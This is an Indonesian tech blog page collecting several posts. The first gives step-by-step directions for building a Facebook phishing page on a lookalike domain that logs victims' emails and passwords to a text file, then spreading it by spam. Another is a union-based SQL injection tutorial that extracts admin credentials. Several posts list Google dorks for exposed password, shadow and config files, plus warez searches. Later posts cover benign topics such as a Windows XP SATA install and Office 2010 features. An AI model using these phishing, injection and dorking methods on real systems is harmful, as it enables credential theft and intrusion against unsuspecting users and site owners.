Langkah-Langkah Pembuatan Fake Login.

Langkah-Langkah Pembuatan Fake Login.

10:51 PM Add Comment
Langkah-langkah pembuatan fake login...

1.   Daftar domain dan webhosting, entah gratisan atau mungkin berbayar,
     jika ingin lebih mantab atau untuk tujuan khusus, sebaiknya yang berbayar,
     jika hanya untuk iseng, saya kira yang gratisan banyak bertebaran di internet,,,,
     catatan=>buat nama domain semirip mungkin dengan facebook, examp : facsbook.com
                   gunakan webhosting yang support php, sante aja sebagian besar hosting support.

2.  Buat fake login atau file dengan nama index.html
    kemudian upload di hosting anda, examp : http://www.hostinganda.com/facebook/index.html

3.  Buat dan upload file logs.php ke hosting anda, letakkan jadi satu dengan file index.html
    Examp : http://www.hostinganda.com/facebook/logs.php

4.  Selanjutnya buat file kosong yang format .txt dengan nama logs.txt. simpen ditempat yang sama
    Examp : http://www.hostinganda.com/facebook/logs.txt

5.  Yang terakhir jangan lupa rubah semua file ke mode permission 777 (chmod + 777).
    artinya dimana semua file dapat dibaca (r), dapat ditulis(w), dan dapat di eksekusi(x).

6.  Sekarang tinggal sebarkan Fake Login anda, bisa ditanam diwarnet, lewat spam,dll.
    atau yang paling sering adalah lewat email, dengan modus konfirmasi pertemanan.

7.  Jika ada yang terjebak Fake Login anda, email dan password-nya akan tertulis di file logs.txt
    jadi untuk melihat hasilnya anda tinggal view file log.txt [tinggal unduh aja]

contoh tampilan fake login

Untuk Sriptcode-nya dah tak jadikan satu + contoh email palsu, silahkan di modifikasi sendiri....
klik dimari...


Cara Mengatasinya...

1.   Perhatiakan URL saat anda akan login Facebook. examp : http://www.facebook.com

2.   Jangan pernah klik link atau bahasa pemrograman apapun yang mencurigakan.
     Jika di klik, kemungkinan account kita akan memberikan username dan password kita.

3.   Jika anda memakai komputer umum [warnet] lebih aman gunakan virtual keyboard,
     saat memasukan password, tak perlu anda gunakan sepanjang bermain internet [seperlunya]
     virtual keyboard tersebut bisa diperoleh dengan mudah untuk Windows XP. [gak paham kalo linux]
     dan hindari check-list kotak “Remember me” pada saat login. [kecuali komp pribadi]

4.   Jika anda tiba-tiba diminta login ulang, sebaiknya anda hati hati,,,
     kemungkinan halaman pe-login ulang tersebut adalah halaman palsu yang sengaja dirancang.
My SQL Injection By I-Tofu

My SQL Injection By I-Tofu

4:00 PM Add Comment
My SQL Injection Step by Step

Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
=step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
ehingga muncul pesan error seperti berikut (masih bnyak lagi):


==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:


[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...
misal:


[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--


===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


============
=step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

seumpama table yang muncul adalah "admin"


===========
=step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--

=============
= step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ?.columns+where+table_name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://www.v3n0m.net/ascii.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ?.columns+where+table_name=0x61646D696E--

============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

==============
= step Delapan:=
==============

tahap terakhir mencari halam admin atau login .


Silahkan DI pelajari Kaka 1 .


======================================
Google Hack 3

Google Hack 3

12:36 AM Add Comment

Google operator

Operator dasar

+, -, ~ , ., *, “”, |, OR

Operator tambahan

allintext:, allintitle:, allinurl:, bphonebook:, cache:, define:, filetype:, info:, intext:, intitle:, inurl:, link:, phonebook:, related:, rphonebook:, site:, numrange:, daterange

Extensi yang dapat dicari:
HyperText Markup Language (html)
Microsoft PowerPoint (ppt)
Adobe Portable Document Format (pdf)
Microsoft Word (doc)
Adobe PostScript (ps)
Microsoft Works (wks, wps, wdb)
Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
Microsoft Excel (xls)
Microsoft Write (wri)
Lotus WordPro (lwp)
Rich Text Format (rtf)
MacWrite (mw)
Shockwave Flash (swf)
Text (ans, txt)

Pencarian berdasarkan range
Exp: komputer Rp5000000..7000000

Pencarian gaji
Salary filetype: xls site: edu
Exp: Salary filetype: xls site: edu

Informasi financial
Exp: Filetype: xls “checking account” “credit card” -intext: Application -intext: Form
Intitle: “Index of” finances.xls

Mencari inbox e-mail
Exp: Intitle: Index.of inurl: Inbox (456) (mit mailbox)
Exp: Intitle: Index.of inurl: Inbox (inurl: User OR inurl: Mail) (220)

Mendeteksi OS
Exp: “Microsoft-IIS/5.0 server at”
Exp: Intitle: “Welcome to Windows 2000 Internet Services” IIS 5.0
Exp: Intitle: Test.Page.for.Apache seeing.this.instead
Exp: Intitle: Test.page “SSL/TLS-aware”

Mencari password
Exp: Inurl: etc inurl: passwd
Exp: Intitle: “Index of..etc” passwd
Exp: "# -FrontPage-" inurl: service.pwd
Exp: Inurl: admin.pwd filetype: pwd
Exp: Filetype: inc dbconn
Exp: Filetype: inc intext: mysql_connect
Exp: Filetype: ini +ws_ftp +pwd
Exp: Filetype: log inurl: “password.log”

Mencari User Name
Exp: +intext: "webalizer" +intext: “Total Usernames” +intext: “Usage Statistics for”

Mencari License Key
Exp: Filetype: lic lic intext: key

Sensitve Directories Listing
Intitle: “Index of” cfide
Intitle: index.of.winnt
Intitle: “index of” iissamples

Google Hack 2

12:34 AM Add Comment
Pada kesempatan ini akan dipaparkan penggunaan mesin pencari informasi Google, untuk mendapatkan informasi yang tersembunyi dan sangat penting. Dimana informasi tersebut tidak terlihat melalui metode pencarian biasa. Artikel ini berdasarkan pada FAQ dan diskusi pada milis situs keamanan jaringan komputer dan tentang metode pengumpulan informasi berkaitan dengan aktifitas webhacking .
Kecenderungan penggunaan teknik ini pada awalnya digunakan untuk mendapatkan informasi sebanyak banyaknya kepada target mesin ataupun mendapatkan hak akses yang tidak wajar. Pencarian informasi secara akurat, cepat dan tepat didasari oleh berbagai macam motif dan tujuan, semoga saja paparan ini digunakan untuk tujuan mencari informasi dengan tujuan yang tidak destruktif, tetapi ialah untuk membantu pencarian informasi yang tepat, cepat dan akurat untuk tujuan yang baik dan bermanfaat.
Dibawah ini akan dijelaskan tentang perintah khusus pada Google, dan akan dijelaskan pengertian dan penggunaan dari tiap – tiap perintah untuk mendapatkan informasi tersembunyi dan sangat penting.

" Intitle:" ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan judul yang mengandung informasi pada topik yang
dimaksud. Sebagai contoh pada pencarian, "intitle: password admin" ( tanpa tanda kutip ). Pencarian akan mencari page yang mengandung kata "password" sebagai judulnya dengan prioritas utama "admin" .
Jika pada pencarian terdapat dua query pencarian utama, digunakan sintaks allintitle: untuk pencarian secara lengkap. Sebagai contoh pada pencarian "allintitle:admin mdb". Maka pencarian akan dibatasi pada dua subjek utama judul yaitu "admin" dan "mdb".

" inurl:" ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan semua URL yang hanya berisi kata kunci informasi yang dimaksudkan. Sebagai contoh pencarian dalam pencarian,"inurl : database mdb". Pencarian akan menghasilkan semua URL yang hanya mengandung informasi tentang "database mdb ".

Hal yang sama juga berlaku pada sintaks ini, jika terdapat dua query pencarian utama, digunakan sintaks "allinurl:" untuk mendapatkan list url tersebut.
Sebagai contoh pencarian "allinurl: etc/passwd" , pencarian akan menghasilkan URL yang mengandung informasi tentang "etc" dan "passwd". Tanda garis miring slash ("/") diantara dua kata etc dan passwd akan diabaikan oleh mesin pencari Google.

"site:" ialah sintaks perintah untuk membatasi pencarian suatu query informasi berdasarkan pada suatu situs atau domain tertentu. Sebagai contoh pada pencarian informasi: "waveguide site:itb.ac.id" (tanpa tanda kutip). Pencarian akan mencari topic tentang waveguide pada semua halaman yang tersedia pada domain itb.ac.id.

"cache:" akan menunjukkan daftar web yang telah masuk kedalam indeks database Google. Sebagai contoh:
"cache:deffcon.org", pencarian akan memperlihatkan list yang disimpan pada Google untuk page deffcon.org

"filetype:" ialah sintaks perintah pada Google untuk pencarian data pada internet dengan ekstensi tertentu (i.e. doc, pdf or ppt etc). Sebagai contoh pada pencarian : "filetype:doc site:go.id confidental" ( tanpa tanda kutip). Pencarian akan menghasilkan file data dengan ekstensi ".doc" pada semua domain go.id yang berisi informasi "confidential".

"link:" ialah sintaks perintah pada Google yang akan menunjukkan daftar list webpages yang memiliki link pada webpage special. Sebagai contoh:"link:" akan menunjuukan daftar webpage yang memiliki point link pada page SecurityFocus.

"intext:" sintaks perintah ini akan mencari kata kata pada website tertentu. Perintah ini mengabaikan link atau URL dan judul halaman. Sebagai contoh :
"intext:admin" (tanpa tanda petik), pencarian akan menghasilkan link pada web page yang memiliki keyword yang memiliki keyword admin.


Beberapa query sintaks diatas akan sangat membantu dalam pencarian data dan informasi lebih detail.
Google dapat menjadi mesin pencari untuk menggali informasi tertentu dan rahasia, informasi yang tidak diperkirakan yang dapat memberitahukan sisi lemah suatu sistem. Hal tersebut yang dimanfaatkan oleh sebagian individu untuk melakukan penetrasi suatu server atau sistem informasi .

Sintaks "Index of" dapat digunakan untuk mendapatkan situs yang menampilkan indeks browsing direktori.
Webserver dengan indeks browsing yang dapat diakses, berarti siapa saja dapat melakukan akses pada direktori webserver, seperti layaknya dapat dilakukan pada lokal direktori pada umumnya.

Pada kesempatan ini pula dipaparkan bagaimana penggunaan sintaks "index of" untuk mendapatkan hubungan pada webserver dengan direktori indeks browsing yang dapat diakses.. Hal tersebut merupakan sumber informasi yang sederhana dapat diperoleh, akan tetapi isi dari informasi seringkali merupakan informasi yang sangat penting. Informasi tersebut dapat saja berupa password akses atau data transaksi online dan hal yang sangat penting lainnya.
Dibawah ini merupakan beberapa contoh penggunaan sintaks "indeks of" untuk mendapatkan informasi yang penting dan sensitive sifatnya.
Index of /admin
Index of /passwd
Index of /password
Index of /mail
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
"Index of /secret"
"Index of /confidential"
"Index of /root"
"Index of /cgi-bin"
"Index of /credit-card"
"Index of /logs"
"Index of /config"
"Index of/admin.asp
"Index of/login.asp

Mencari sistem atau server yang vulnerable menggunakan sintaks "inurl:" atau "allinurl:"

1. Menggunakan sintaks "allinurl:winnt/system32/" (dengan tanda petik ) akan menampilkan daftar semua link pada server yang memberikan akses pada direktori yang terlarang seperti "system32". Terkadang akan didapat akses pada cmd.exe pada direktori "system32" yang memungkinkan seseorang untuk mengambil alih kendali sistem pada server tersebut.

2. Menggunakan "allinurl:wwwboard/passwd.txt" ( dengan tanda petik ) akan menampilkan daftar semua link pada server yang memiliki kelemahan pada "wwwboard Password". Pembahasan lebih lanjut tentang vulnerability "wwwboard Password" dapat dilihat pada site keamanan jaringan seperti atau

3. Menggunakan sintaks “inurl: bash history” (dengan tanda petik ) akan menampilkan daftar link pada server yang memberikan akses pada file “bash history” melalui web. File tersebut merupakan command history file yang mengandung daftar perintah yang dieksekusi oleh administrator, yang terkadang menyangkut informasi sensitive seperti password sistem. Seringkali password pada sistem telah dienkripsi, untuk mendapatkan password aslinya bentuk yang dienkripsi ini harus didekripsi menggunakan program password cracker. Lama waktu untuk mendapatkan hasil dekripsi tergantung dari keandalan program dan banyaknya karakter yang terenkripsi.

4. Menggunakan “inurl:config.txt” (dengan tanda petik) akan menampilkan daftar semua link pada server yang memberikan akses pada file “config.txt. File ini berisi informasi penting termasuk hash value dari password administrator dan proses autentifikasi dari suatu database.

Sintaks “inurl:” atau “allinurl:” dapat dikombinasikan dengan sintaks yang lainnya seperti pada daftar dibawah ini :

Inurl: /cgi-bin/cart32.exe
inurl:admin filetype:txt
inurl:admin filetype:db
inurl:admin filetype:cfg
inurl:mysql filetype:cfg
inurl: passwd filetype:txt
inurl:iisadmin
inurl:auth_user_file.txt
inurl: orders.txt
inurl:"wwwroot/*."
inurl:adpassword.txt
inurl:webeditor.php
inurl:file_upload.php
inurl:gov filetypels "restricted"
index of ftp +.mdb allinurl:/cgi-bin/ +mailto allinurl:/scripts/cart32.exe allinurl:/CuteNews/show_archives.php
allinurl:/phpinfo.php
allinurl:/privmsg.php
allinurl:/privmsg.php
inurl:cgi-bin/go.cgi?go=*
allinurl:.cgi?page=*.txt
allinurul:/modules/My_eGallery
Mencari suatu sistem atau server yang memiliki kelemahan dengan sintaks “intitle:”
atau “allintitle:”

1. Menggunakan allintitle: "index of /root” ( tanpa tanda kutip ) akan menampilkan
Daftar link pada webserver yang memberikan akses pada direktori yang terlarang seperti direktori root.

2. Menggunakan allintitle: "index of /admin” ( tanpa tanda kutip ) akan menampilkan link pada site yang memiliki indeks browsing yang dapat diakses untuk direktori terlarang seperti direktori “admin”.

Penggunaan lain dari sintaks “intitle:” atau “allintitle:” yang dikombinasikan dengan sintaks lainnya antara lain :

intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
allintitle:*.php?filename=*
allintitle:*.php?page=*
allintitle:*.php?logon=*


Penggunaan dan kombinasi pada sintaks tidak hanya terbatas pada contoh paparan diatas. Masih banyak lagi kombinasi dari sintaks sintaks dengan berbagai kata kunci yang dapat digunakan. Hal tersebut bergantung pada kreativitas dan kemauan untuk mencoba. Ada baiknya penggunaan wacana yang telah dipaparkan ini digunakan untuk kepentingan yang tidak menimbulkan kerugian atau kerusakan.
Kelemahan pada suatu sistem atau server yang diketahui ada baiknya dilakukan sharing dengan administrator sistem yang bersangkutan sehingga dapat bermanfaat bagi semua pihak. Dikarenakan kemungkinan besar hasil dari pencarian informasi dapat memberikan informasi yang sensitive, yang seringkali menyangkut segi keamanan suatu sistem atau server.
Wacana tentang sintaks yang sangat membantu dalam pencarian informasi tersebut akhirnya tergantung pada niat dan tujuan dalam pencarian data. Apakah sungguh sungguh dilakukan untuk kebutuhan pencarian data, mengumpulkan informasi dari suatu mesin target penetrasi. Tujuan akhirnya bergantung pada niat individu yang bersangkutan sehingga penulis tidak bertanggung jawab terhadap penyalahgunaan dari informasi yang telah dipaparkan. Seperti kata pepatah baru pajak ditanggung pemenang.
Google Hack 1

Google Hack 1

12:32 AM Add Comment
ini sekumpulan tip yang saya dapatkan dari berbagai sumber terpercaya dan dijamin dapat mempermudah percarian dalam search engine google..

1.Googling E-Book.
+(”index of”) +(”/ebooks”|”/book”) +(chm|pdf|zip|rar) +apache
Adalah Query yang menghasilkan Index ebook di server yang berbasis Apache
allinurl: +(rar|chm|zip|pdf|tgz|lit) judul buku
Ganti “judul buku” dengan buku yang ingin dicari. Jika ingin mencari “Wiro Sableng”, ganti “judul buku” dengan Wiro Sableng. Cara ini digunakan jika benar-benar mengetahui judul buku yang dicari.

2.Googling Warez.
“parent directory ” Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” applications -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
Ganti Kata yang tebal dengan query.
Contoh, jika ingin mencari Limewire maka ganti “applications” dengan Limewire. jika ingin mencari lagu dari Deep Purple berjudul Child In Time, ganti “MP3″ dengan Child in Time atau jika ingin mencari lagu-lagu Deep Purple tinggal ganti “MP3″ dengan Deep Purple.

3.Googling MP3
?intitle:index.of? mp3
Cara lain untuk mencari MP3 di google adalah menggunakan Query ini. Setelah MP3 kasih apa yang pengen dicari.
Contoh: Jika ingin mencari Led Zeppelin maka query-nya akan seperti ini
?intitle:index.of? mp3 led zeppelin

4.Googling file di megaupload
Untuk mencari File Video ketik :
avi|mpg|mpeg|wmv|rmvb site:megaupload.com
Untuk mencari File musik ketik :
mp3|ogg|wma site:megaupload.com
Untuk mencari archive dan program ketik :
zip|rar|exe site:megaupload.com
Untuk mencari ebooks ketik :
pdf|rar|zip|doc|lit site:megaupload.com

5.Googling file di rapidshare.de
Untuk mencari File Video ketik :
avi|mpg|mpeg|wmv|rmvb site:rapidshare.de
Untuk mencari File musik ketik :
mp3|ogg|wma site:rapidshare.de
Untuk mencari archive dan program ketik :
zip|rar|exe site:rapidshare.de
Untuk mencari ebooks ketik :
pdf|doc|lit|rar|zip site:rapidshare.de

6.Untuk Googling di Megaupload dan rapidshare bisa langsung meletakkan apa yang diinginkan di bagian pertama.
Contoh: Jika ingin mencari DA VINCI CODE ebook gunakan query ini
da vinci code pdf|doc|lit|rar|zip site:rapidshare.de
(ini jika kita benar-benar tahu judul bukunya.)

Cara Install Windows XP pada Harddisk SATA dengan Nlite

10:00 PM Add Comment
Jika komputer (pc/laptop) anda menggunakan harddisk type SATA dan memilih untuk menginstal Operating System Windows XP, kemungkinan pada saat anda menginstall windows XP belum bisa mengenali Harddisk SATA tersebut, tetapi hardisk anda dapat dikenali oleh bios, jika hal ini terjadi maka anda harus menginjeksikan driver sata komputer anda ke dalam file windows installer. Biasanya file driver sata sudah ada dalam cd driver notebook/mainboard yang anda peroleh pada saat anda membeli komputer.(jika cd ini tidak ada mintalah ke penjual komputer anda).


Jika driver satanya tidak ada di cd tersebut, anda bisa mencari di situs pembuat komputer anda, Pada situs tersebut masuk ke tab driver, kemudian lakukan browse dan gunakan kata kunci sesuai spesifikasi komputer anda. Untuk notebook gunakan kode atau seri notebook anda :
misal: (laptop) Acer Travelmate 6291, (Pc) gunakan type dan seri mainboard misal : Gigabyte GA-P31-S3G

Keterangan: Dari pengalaman pribadi, beberapa komputer atau notebook sekarang ada yang tdk perlu melakukan injeksi driver sata, misalnya notebook acer type terbaru rata2 tdk membutuhkan driver sata, hanya perlu melakukan pengaturan interface hardisk pada bios, jika ingin menginstal windows XP maka ubah interface hardisk ke IDE, jika ingin instal windows vista ubah setting interface hardisk ke ACHI.

Setelah anda memperoleh driver sata komputer anda, yang anda perlu lakukan hanya melakukan injeksi driver sata tersebut

Software untuk menginjeksi driver sata ke windows installer adalah nlite (merupakan software freware), anda bisa mendownload software tsb di situs : http://www.nliteos.com atau http://www.nliteos.com/download.html


Setelah terdownload, coba instal nlite, jika tidak bisa terinstal biasanya di komputer anda perlu diinstal service pack windows XP, yaitu NET Framework 2.0
dapat anda download di:
http://www.nliteos.com/download.html , http://www.microsoft.com/downloads atau di http://www.microsoft.com/downloads/details.aspx?FamilyID=79bc3b77-e02c-4ad3-aacf-a7633f706ba5&DisplayLang=en

1. Langkah selanjutnya adalah memulai proses injeksi driver sata ke windows installer. Proses ini harus anda lakukan di komputer teman yang sudah aktif windowsnya.
Copy seluruh isi cd windows installer ke dalam hardisk, beri nama direktori misal:WinXPSP2
Kemudian jalankan program nlite


2. Klik Next


3. Klik Browse, arahkan ke direktori yang berisi file windows installer ( D:WinXPSP2)



4. Klik Next



5. Klik Next, maka akan muncul kotak dialog berikut:


6. Klik Driver dan Bootable ISO hingga tombolnya berwarna hijau
(Driver : untuk mengintegrasikan driver misal driver sata ke dalam wiindows installer, anda juga bisa memasukkan driver yg lain)
(Bootable ISO agar windows installer yang anda buat bisa booting secara otomatis pada saat telah dicopy ke CD)
Klik tombol Next


7. Pilih Multiple driver folder jika drivernya lebih dari satu, jika hanya satu file saja pilih single driver


8. Cari file yang berisi driver sata komputer anda, setelah ketemu kilk OK


9. Klik Ok



10. Klik OK


11. Klik Yes pada kotak dialog "Do you want to start the process?"


12. Klik Next (Anda sudah berhasil mengintegrasikan driver sata ke windows installer), selanjutnya anda akan membuat file ISO atau langsung diburning ke CD blank


13. Sekarang anda bisa membuat dulu ISOnya, atau langsung memburning ke CD blank. Masukkan CD ke CD RW Drive kemudian tekan tombol Burn,
Selamat anda sudah mempunyai file master windows installer buatan sendiri.

14. Langkah selajutnya adalah kembali ke komputer pertama anda, jalankan komputer dan atur setting bios agar booting dimulai dari CD ROM.

15. Silahkan anda melakukan instalasi file windows installer dengan CD tadi, ikuti instrkusinya, pasti tidak akan minta driver sata lagi dan hardisk sata anda sudah dapat dikenali oleh Windows XP (jika belum dikenali berarti masih ada file driver sata yang belum anda injeksikan ke windows installer, silahkan lakukan kembali prosedur 1 s/d 12 untuk memperbaikinya)

Semoga sukses.....!!!!!!
10 Fitur Terbaru dari Microsoft Office 2010

10 Fitur Terbaru dari Microsoft Office 2010

9:54 PM Add Comment
Microsoft Office 2010 versi Beta, sekarang bisa Anda download di MSDN dan TechNet. Berikut adalah beberapa fitur baru dari Microsoft Office 2010.

1. Simpan Dokumen
Dengan Microsoft Office 2010, anda bisa langsung meng-upload dokumen ke account Windows Live SkyDrive dan mengaksesnya dari computer lain. SkyDrive menyediakan 25 GB penyimpanan online gratis, karena layanan ini diintegrasikan dengan Office Web Apps. Anda dapat melihat dan mengedit dokumen-dokumen ini di mana saja di web browser tanpa membutuhkan Microsoft Office (bahkan pada Mac).
2.  Memasukkan web video di presentasi Anda
Dengan Office 2010, Anda dengan mudah dapat menambahkan video klip dari internet ke dalam presentasi PowerPoint Anda seperti video Flash dalam halaman web biasa. Caranya gampang, hanya menyalin kode embed dari YouTube (atau situs sharing video lainnya) dan menempelkannya di mana saja pada slide.
3. Quick Steps in Outlook
Gmail menyertakan fitur "Send dan Archive" yang multi tasking. Ketika Anda mengklik tombol ini, pertama kali akan mengirim balasan dan kemudian tersipan sebagai arsip hanya dengan satu kali klik. Dengan fitur baru "Quick Steps in Outlook", Anda dapat menggunakan setiap item Outlook dengan sekali klik. Selain "Send dan Archive", sebagai contoh lain adalah langkah cepat untuk “Send and Delete”, fitur ini yang akan menghapus email dari inbox Anda setelah Anda mereply email Anda.
4. Membuat file PDF
Semua program Office 2010 mempunyai fitur “built-in PDF writer” yaitu  untuk membantu Anda menyimpan dokumen ke format PDF hanya dengan mengklik fitur tersebut.
5. Cetak dokumen
Dengan Office 2010, Microsoft telah merubah dialog box untuk mencetak dokumen dan itu merupakan peningkatan yang luar biasa. Misalnya, Anda dapat setting printer (seperti margin halaman, dll) dan melihat perubahannya per halaman
6. Broadcast Slideshows dalam PowerPoint
Ini mungkin fitur favorit dari PowerPoint 2010. Anda dapat memberikan presentasi secara live melalui web dalam PowerPoint dan siapa pun di dunia dapat melihat presentasi Anda menggunakan web browser.
7. Editing Video dalam PowerPoint
Apakah Anda ingin memotong beberapa bagian dari video klip sebelum digunakan dalam presentasi Anda? Atau apakah Anda ingin refleksi seperti digabungkan dengan 3D rotasi sehingga audiens terus terpaku dengan presentasi Anda? Yah, itu mudah karena PowerPoint 2010 sekarang, fitur editing video juga tersedia
8.  Distribusi slides sebagai video
PowerPoint 2010 dapat mengubah presentasi Anda ke dalam bentuk file video yang dapat Anda upload ke YouTube atau mendistribusikan pada media player portabel seperti iPod.
9. Built-in Screen Capture
Semua program Office 2010 sekarang tersedia screen clipping utility. Perangkat ini secara otomatis akan mengambil screenshot dari semua aplikasi yang terbuka pada desktop Anda (tidak termasuk aplikasi yang diminimize) dan Anda dapat memasukkannya langsung ke dalam dokumen Anda atau presentasi Anda.
10. Outlook gets social
Bila Anda membuka pesan email dalam Outlook 2010, akan ditampilkan informasi terkait seperti attachments file, gambar,  meeting requests, dan semua pesan email sebelumnya yang mungkin ditukar dengan yang lain (seperti Xobni).

Ada dua hal yang penting sebelum menginstal Office 2010 yaitu :
1. Jika Anda menginstal Office 2010 versi beta untuk pertama kalinya, pengaturan default akan meng-upgrade Microsoft Office Anda. Namun Anda dapat menyesuaikan pengaturan ini dan menginstal Office 2010 bersama-sama dengan versi Office sebelumnya.
2. Jika Anda sudah memiliki Technical Preview Office 2010 pada komputer Anda, pastikan Anda benar-benar uninstall edisi ini sebelum mencoba untuk menginstal Office 14 versi beta. Biasanya Anda akan kesulitan untuk install Office oleh sebab itu gunakanlah cleanup utility untuk menghapus semua jejak Office versi sebelumnya dari sistem anda.

Jangan sembarang click video di Facebook

9:44 PM Add Comment
• Peringatan dari Sophos, account anda dimanfaatkan sebagai iklan

Sophos memperingatkan member Facebook, adanya posting dengan judul 'the sexiest video ever'.
Ribuan user Facebook sempat terkejut, karena menemukan pesan di wall, terlihat seperti kiriman dari rekan lain.

Pesan video yang ditayangkan dengan pesan ", this is without doubt the sexiest video ever! :P :P :P". There is a video with the title "Candid Camera Prank [HQ]".
Pesan tersebut menampilkan potongan film dengan seorang wanita dengan celana pendek bersepeda. Durasinya 3.17 menit.
Jika di click, anda tidak akan mendapat tayangan video, melainkan sebuah aplikasi dari Facebook.
Dari  laporan yang menerima pesan tersebut mengatakan adanya pesan lanjutan dengan video player anda sudah tertinggal versinya. Trik tersebut hanyalah tipuan, dan memanfaatkan kelemahaan dari si member Facebook untuk keuntungan si pengirim

Tipuan dari video tersebut dirancang untuk menginstall Hotbar Adware, gunanya memberikan pendapat dari si pengirim.

Trik Mempercepat Download di 4shared

9:40 PM Add Comment
buat kalian yang suka download....pasti sudah kenal dengan 4shared, tempat buat download n upload file-file secara gratis. Tapi 4shared ini proses downloadnya sangat lambat bahkan suka putus di tengah jalan atau downloadnya ga tuntas.....bikin kita kesel kan??

Nah....skrang gw kasih trik buat mempercepat download di 4shared :
  1. Seperti biasanya, setelah memilih file yang mau didownload, ikuti prosesnya sampai ada hitungan mundur dari 10 sampai 0, kemudian muncul link untuk download
  2. Klik kanan link download tersebut, kemudian pilih copy link location.
  3. buka alamat http://www.phproxysite.com
  4. paste alamat link dari 4shared tadi pada kotak kosong yang tersedia.
  5. Klik StartBrowsing.
Untuk proses downloadnya disarankan untuk menggunakan software IDM (Internet Download Manager), FDM (Free Download Manager).

Selain proxy : http://www.phproxysite.com/ diatas, bisa dicoba dengan alamat dibawah ini :

1. http://www.phpmyproxy.com/
2. http://www.phproxysite.org/

Selamat mencoba boz......langsung enjoy
Tools yang Kudu Dimiliki Saat Komputer Terserang VIRUS

Tools yang Kudu Dimiliki Saat Komputer Terserang VIRUS

9:38 PM Add Comment
1. Process Explorer sebagai pengganti Task Manager (taskmgr.exe)

Task Manager sangatlah penting karena dari situ kita bisa melihat hampir seluruh proses

Yang sedang berjalan di windows, begitu juga jumlah memory yang terpakai dan CPU yang terpakai. Jika kita menemukan sesuatu yang mencurigakan disitu, kita bisa akhiri prosesnya (terminating). Jika kita tidak bisa menggunakan Task Manager dan mendapatkan pesan “Task Manager has been disabled by your administrator”, kita bisa menggunakan Process Explorer. Tool ini portable kita bisa menyimpannya di usb drive.


